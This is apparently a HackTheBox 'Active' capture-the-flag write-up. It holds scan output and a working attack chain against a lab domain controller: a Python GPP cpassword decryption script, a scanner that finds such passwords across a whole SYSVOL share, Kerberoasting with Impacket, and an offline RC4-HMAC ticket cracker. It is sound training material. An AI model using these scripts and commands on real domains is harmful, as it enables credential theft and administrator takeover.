Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 18:02 CEST
Stats: 0:00:34 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 70.59% done; ETC: 18:03 (0:00:13 remaining)
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.46% done; ETC: 18:04 (0:00:00 remaining)
Nmap scan report for active (10.129.183.196)
Host is up (0.053s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-05-11 16:03:02Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2023-05-11T16:03:57
|_  start_date: 2023-05-11T15:13:58
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.44 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 18:02 CEST
Nmap scan report for active (10.129.183.196)
Host is up (0.053s latency).
Not shown: 65512 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49173/tcp open  unknown
49174/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 53.94 seconds
smbmap as a null session (no credentials): only Replication is readable.

SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[+] IP: active:445      Name: unknown           Status: Authenticated
        Disk                 Permissions     Comment
        ----                 -----------     -------
        ADMIN$               NO ACCESS       Remote Admin
        C$                   NO ACCESS       Default share
        IPC$                 NO ACCESS       Remote IPC
        NETLOGON             NO ACCESS       Logon server share
        Replication          READ ONLY
        SYSVOL               NO ACCESS       Logon server share
        Users                NO ACCESS
smbmap with the SVC_TGS credentials: NETLOGON, SYSVOL and Users become readable as well.

SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[+] IP: active:445      Name: unknown           Status: Authenticated
        Disk                 Permissions     Comment
        ----                 -----------     -------
        ADMIN$               NO ACCESS       Remote Admin
        C$                   NO ACCESS       Default share
        IPC$                 NO ACCESS       Remote IPC
        NETLOGON             READ ONLY       Logon server share
        Replication          READ ONLY
        SYSVOL               READ ONLY       Logon server share
        Users                READ ONLY
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  active.htb                          D        0  Sat Jul 21 12:37:44 2018
Using workgroup WORKGROUP, guest user
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
smb://active/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
smb://active/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Downloaded 8,11kB in 7 seconds
tree -L 8
.
├── DfsrPrivate
│   ├── ConflictAndDeleted
│   ├── Deleted
│   └── Installing
├── Policies
│   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   │   ├── GPT.INI
│   │   ├── Group Policy
│   │   │   └── GPE.INI
│   │   ├── MACHINE
│   │   │   ├── Microsoft
│   │   │   │   └── Windows NT
│   │   │   │       └── SecEdit
│   │   │   │           └── GptTmpl.inf
│   │   │   ├── Preferences
│   │   │   │   └── Groups
│   │   │   │       └── Groups.xml
│   │   │   └── Registry.pol
│   │   └── USER
│   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│       ├── GPT.INI
│       ├── MACHINE
│       │   └── Microsoft
│       │       └── Windows NT
│       │           └── SecEdit
│       │               └── GptTmpl.inf
│       └── USER
└── scripts

21 directories, 7 files
#!/usr/bin/env python3
import base64

from Crypto.Cipher import AES          # pycryptodome
from Crypto.Util.Padding import unpad

# This script can be used to decrypt Active Directory passwords found
# in GPP files in SYSVOL shares used to manage GPOs.
# Key and zero IV are the ones Microsoft publishes in MS-GPPREF.


def decrypt(password):
    # cpassword values are stored without the trailing base64 '=' padding: restore it
    password = password + "=" * ((4 - len(password)) % 4)
    raw_ciphertext = base64.b64decode(password)
    key = b"\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
    iv = b"\x00" * 16
    cipher = AES.new(key, AES.MODE_CBC, iv)
    raw_plaintext = unpad(cipher.decrypt(raw_ciphertext), AES.block_size)
    # The plaintext is a Windows wide string (UTF-16LE). A bare .decode() only
    # looks right because the terminal swallows the interleaved NUL bytes.
    plaintext = raw_plaintext.decode("utf-16-le")
    print(plaintext)
    return plaintext


if __name__ == "__main__":
    password = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
    decrypt(password)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2023-05-11 17:14:46.640920
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2023-05-11 17:14:46.640920

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b803e7e55b385933344c2801e4813a20$[...]
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:06 DONE (2023-05-11 19:12) 0.1461g/s 1540Kp/s 1540Kc/s 1540KC/s Tiffani143..Thrall
Use the "--show" option to display all of the cracked passwords reliably
Session completed
SVC_TGS:GPPstillStandingStrong2k18
Administrator:Ticketmaster1968
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
After an nmap scan of all TCP ports we found the following open ports:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49173/tcp open  unknown
49174/tcp open  unknown
This combination of ports (DNS, Kerberos, LDAP and Global Catalog, kpasswd, SMB, ADWS and DFSR on a single host) is the signature of a Windows Active Directory domain controller; the service scan confirms it (host name DC, domain active.htb). Enumerating SMB (port 445) without credentials, i.e. as a null session, we found one share we can read:

smbmap -H active

        Replication          READ ONLY
At this point we can access the share in several ways:

smbclient, to connect interactively and browse the remote files (-N sends no password, -I points the client at the host regardless of the server name given in the UNC path):

smbclient //MOUNT/Replication -I active -N

smbget, to download the whole share recursively as guest (-a):

smbget -a -R smb://active/Replication
The files downloaded from the share are the following. The layout (DfsrPrivate, Policies, scripts) is that of a SYSVOL replica, and the two GUID folders are the well-known Default Domain Policy ({31B2F340-016D-11D2-945F-00C04FB984F9}) and Default Domain Controllers Policy ({6AC1786C-016F-11D2-945F-00C04fB984F9}) GPOs. The file that matters is MACHINE/Preferences/Groups/Groups.xml, a Group Policy Preferences (GPP) item.

smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
smb://active/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
smb://active/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Groups.xml carries a cpassword attribute. GPP encrypts it with AES-256-CBC, but the key (and the all-zero IV) are published by Microsoft in the MS-GPPREF specification, so every domain user who can read SYSVOL can recover the plaintext:

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN
https://adsecurity.org/?p=2288

4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

Using this key (the Python script above) we decrypted the credentials in Groups.xml and obtained

SVC_TGS:GPPstillStandingStrong2k18

Note that MS14-025 only stopped the Group Policy editor from creating new items with a password; values already stored in SYSVOL stay there until the item is removed, which is exactly what this box relies on.
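The script above handles one hard-coded cpassword. The following added example (not part of the original write-up) generalises it: it walks a downloaded share, parses every Group Policy Preferences file that can carry a cpassword, pairs the value with the account it belongs to, and decrypts it with the MS-GPPREF key. The Groups.xml sample is the one from this box; the Services.xml sample is constructed here to show the accountName attribute and its cpassword is a placeholder. It assumes pycryptodome for AES (imported lazily so the parsing still runs without it) and assumes the per-file account attribute names (userName, accountName, runAs, username) that these preference types use.

```python
#!/usr/bin/env python3
"""Find and decrypt every GPP cpassword under a downloaded SYSVOL/Replication tree.

Added example, not from the original write-up. AES-CBC comes from pycryptodome
(pip install pycryptodome); the key is the public one from MS-GPPREF.
"""
import base64
import os
import sys
import xml.etree.ElementTree as ET

# AES-256 key published in MS-GPPREF 2.2.1.1.4 ("Password Encryption")
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Preference files that can carry a cpassword, and the attribute that names the
# account next to it (Groups/Drives: userName, Services: accountName,
# ScheduledTasks: runAs, DataSources/Printers: username) - assumed mapping
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def decrypt_cpassword(cpassword: str) -> str:
    """Restore the stripped base64 '=' padding, AES-256-CBC decrypt with a zero IV,
    remove the PKCS#7 padding and decode the UTF-16LE plaintext."""
    from Crypto.Cipher import AES           # imported here so the XML parsing
    from Crypto.Util.Padding import unpad   # below works without pycryptodome
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    cipher = AES.new(GPP_KEY, AES.MODE_CBC, iv=bytes(AES.block_size))
    return unpad(cipher.decrypt(raw), AES.block_size).decode("utf-16-le")


def find_cpasswords(xml_text: str) -> list:
    """Return [(account, cpassword)] for every <Properties> element that has one."""
    hits = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cp = props.get("cpassword")
        if cp:
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
            hits.append((account, cp))
    return hits


def scan_tree(root_dir: str):
    """Yield (path, account, cpassword) for every GPP file below root_dir."""
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:   # tolerate a BOM
                    for account, cp in find_cpasswords(fh.read()):
                        yield path, account, cp


# Constructed sample inputs: the Groups.xml from the write-up, and a made-up
# Services.xml entry (placeholder cpassword, not a real ciphertext)
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS"
        image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\SVC_TGS"/>
  </User>
</Groups>"""
SAMPLE_SERVICES_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<NTServices>
  <NTService name="backup">
    <Properties startupType="AUTOMATIC" serviceName="backup"
                accountName="active.htb\svc_backup" cpassword="PLACEHOLDER-NOT-A-REAL-CPASSWORD"/>
  </NTService>
</NTServices>"""

if __name__ == "__main__":
    # Usage: python3 gpp_cpassword.py <downloaded share root>
    # Without an argument, run against the embedded samples.
    if len(sys.argv) > 1:
        for path, account, cp in scan_tree(sys.argv[1]):
            print(f"{path}: {account} -> {decrypt_cpassword(cp)}")
    else:
        for account, cp in find_cpasswords(SAMPLE_GROUPS_XML):
            print(f"{account} -> {decrypt_cpassword(cp)}")
        for account, cp in find_cpasswords(SAMPLE_SERVICES_XML):
            print(f"{account} -> cpassword present (placeholder, not decrypted)")
```

Run it against the directory smbget produced (the one containing Policies/) and it reports every account whose password an attacker with SYSVOL read access can recover, not just the Groups.xml case seen on this box.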
Using the credentials found, I logged in over SMB to the Users share and found the user flag on SVC_TGS's Desktop:

smbclient //MOUNT/Users -I active -U=SVC_TGS%GPPstillStandingStrong2k18
With SVC_TGS's credentials in hand we enumerate SPNs (Kerberoasting) using Impacket's GetUserSPNs.py:

GetUserSPNs.py -dc-ip 10.129.183.196 active.htb/SVC_TGS:GPPstillStandingStrong2k18

We find the service active/CIFS:445 registered on the Administrator account. Any authenticated domain user can ask the KDC for a service ticket to that SPN, and the ticket is encrypted with the NT hash of the account that owns the SPN (here RC4-HMAC, etype 23), so it can be cracked offline. We request it with the -request flag, which prints the ticket in john/hashcat format:

GetUserSPNs.py -dc-ip 10.129.183.196 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
The ticket obtained is the following (the encrypted part is truncated here):

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b803e7e55b385933344c2801e4813a20$[...]
This ticket can be cracked with john as follows:

john --format=krb5tgs --wordlist=~/repos/projects/wordlists/passwords/rockyou.txt CIFS_ticket.txt

and we finally obtain the password

Administrator:Ticketmaster1968
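What john actually does with a $krb5tgs$23$ line is shown in the following added example (not part of the original write-up): for each candidate it derives the NT hash (MD4 of the UTF-16LE password), runs the RFC 4757 RC4-HMAC decryption of the ticket's enc-part with key usage 2, and accepts the candidate when the HMAC-MD5 checksum verifies. No Kerberos ASN.1 parsing is needed, which is why etype 23 tickets crack so fast. MD4 and RC4 are implemented inline so the code runs without an OpenSSL that still exposes MD4. Because the real ticket's ciphertext is truncated on this page, the sample ticket is constructed from the recovered password "Ticketmaster1968" with a stand-in enc-part; the Administrator/ACTIVE.HTB/active/CIFS:445 names are the ones from the write-up.

```python
"""Offline check of a $krb5tgs$23$ (RC4-HMAC) ticket against candidate passwords.
Added example, not part of the original write-up. Pure Python MD4/RC4 so it needs
no OpenSSL legacy provider. The sample ticket below is constructed, not captured."""
import hashlib
import hmac
import os
import struct

M32 = 0xFFFFFFFF
KEY_USAGE_TGS_TICKET = 2   # RFC 4120 key usage for a ticket's enc-part


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4. The NT hash is MD4 over the UTF-16LE password."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & M32
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", len(msg) * 8)
    rounds = (  # (step function, additive constant, message-word order, shifts)
        (f, 0, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for n, i in enumerate(order):
                a = rol((a + fn(b, c, d) + x[i] + k) & M32, shifts[n % 4])
                a, b, c, d = d, a, b, c   # rotate so the next step updates the old d
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def _ki(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key, usage, plaintext, confounder=None):
    """RFC 4757: checksum = HMAC-MD5(Ki, conf||data); RC4 key = HMAC-MD5(Ki, checksum)."""
    ki = _ki(key, usage)
    blob = (confounder or os.urandom(8)) + plaintext
    checksum = hmac.new(ki, blob, hashlib.md5).digest()
    return checksum, rc4(hmac.new(ki, checksum, hashlib.md5).digest(), blob)


def rc4_hmac_verify(key, usage, checksum, edata) -> bool:
    """Decrypt under the checksum-derived RC4 key, then recompute the checksum.
    A wrong NT hash yields garbage whose HMAC does not match: that is the crack test."""
    ki = _ki(key, usage)
    plain = rc4(hmac.new(ki, checksum, hashlib.md5).digest(), edata)
    return hmac.compare_digest(hmac.new(ki, plain, hashlib.md5).digest(), checksum)


def parse_krb5tgs(line: str):
    """'$krb5tgs$23$*user$REALM$spn*$<checksum hex>$<edata hex>' as Impacket prints it."""
    prefix = "$krb5tgs$23$*"
    if not line.startswith(prefix):
        raise ValueError("only RC4-HMAC (etype 23) tickets are handled here")
    ident, blob = line[len(prefix):].split("*$", 1)
    user, realm, spn = ident.split("$", 2)
    checksum_hex, edata_hex = blob.split("$", 1)
    return user, realm, spn, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack(line: str, wordlist):
    """Return the first candidate whose NT hash verifies the ticket, else None."""
    _, _, _, checksum, edata = parse_krb5tgs(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), KEY_USAGE_TGS_TICKET, checksum, edata):
            return candidate
    return None


def make_sample_ticket(user, realm, spn, password, enc_part=b"constructed EncTicketPart"):
    """Constructed sample: encrypt a stand-in ticket body under the account's NT hash."""
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_TGS_TICKET, enc_part)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


if __name__ == "__main__":
    ticket = make_sample_ticket("Administrator", "ACTIVE.HTB", "active/CIFS:445", "Ticketmaster1968")
    print("cracked:", crack(ticket, ["Tiffani143", "Thrall", "Ticketmaster1968"]))
```

The defensive reading is the same as the offensive one: an SPN on a highly privileged account plus RC4 ticket encryption makes that account's password guessable at wordlist speed by any domain user. Moving the SPN to a dedicated service account with a long random password (or a gMSA) and disabling RC4 for it removes this path.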
With this password we can log into SMB as Administrator and find the root flag at

Users\Administrator\Desktop\root.txt

which completes the machine.
user: 6c4ed2500bd7ed8605de1fc2a7d80eca
root: 3be06f2e50f63b23b2640ec6f49ec885